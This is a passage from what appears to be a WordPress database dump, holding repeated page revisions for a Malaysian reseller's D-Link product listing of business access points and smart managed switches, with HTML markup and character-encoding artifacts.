reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:18:48','2019-09-25 07:18:48','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3427,1,'2019-09-25 15:34:28','2019-09-25 07:34:28','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP</p><p>Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W</p><p>Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Access Control List (ACL) feature to enhances network security</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>Cable diagnostics function to help troubleshooting wiring problem</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Built-in SNMP MIB for remote Network Management Systems</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:34:28','2019-09-25 07:34:28','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3428,1,'2019-09-25 15:38:04','2019-09-25 07:38:04','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP</p><p>Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W</p><p>Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Access Control List (ACL) feature to enhances network security</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>Cable diagnostics function to help troubleshooting wiring problem</p>		\n		<center>[maxbutton id=\"6\" ]</center>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management (SIM)</p><p>Built-in SNMP MIB for remote Network Management Systems</p><p>Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support Layer 2 Features â€“ IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>Virtual stacking of up to 32 units via D-linkâ€™s Single IP Management 